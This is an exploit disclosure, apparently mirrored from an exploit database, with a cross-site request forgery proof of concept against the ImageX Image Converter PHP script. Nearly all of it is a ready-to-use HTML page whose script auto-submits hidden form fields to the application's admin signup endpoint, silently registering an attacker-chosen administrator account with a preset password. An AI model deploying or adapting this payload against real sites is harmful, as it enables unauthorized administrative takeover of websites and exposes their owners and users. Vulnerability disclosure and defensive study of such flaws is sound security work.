Share
## https://sploitus.com/exploit?id=PACKETSTORM:189625
Exploit Title: ImageX - Image Converter - Cross Site Request Forgery (CSRF) (Add Admin)
    Date: 05-03-2025
    Exploit Author: Buğra Enis Dönmez
    Vendor Homepage: https://www.codester.com/items/48649/imagex-image-converter-120-formats-php-script
    Version: latest
    Tested on: Arch Linux
    #####################################  CSRF PoC #####################################
    
    <!DOCTYPE html>
    <html>
    <head>
        <title>CSRF PoC</title>
    </head>
    <body>
        <h1>CSRF PoC</h1>
        <form id="csrfForm" action="https://localhost/mega-img-converter/actions/regadminsignupauth.php" method="POST" enctype="multipart/form-data">
            <input type="hidden" name="name" value="pwned@pwned.com" />
            <input type="hidden" name="lastname" value="neci" />
            <input type="hidden" name="email" value="enis@neci.com" />
            <input type="hidden" name="password" value="kenan5" />
            <input type="hidden" name="confirmpassword" value="kenan5" />
            <input type="hidden" name="isajax" value="someValue" />
        </form>
        <script>
            document.getElementById('csrfForm').submit();
        </script>
    </body>
    </html>
    
    #####################################  CSRF PoC Ended #####################################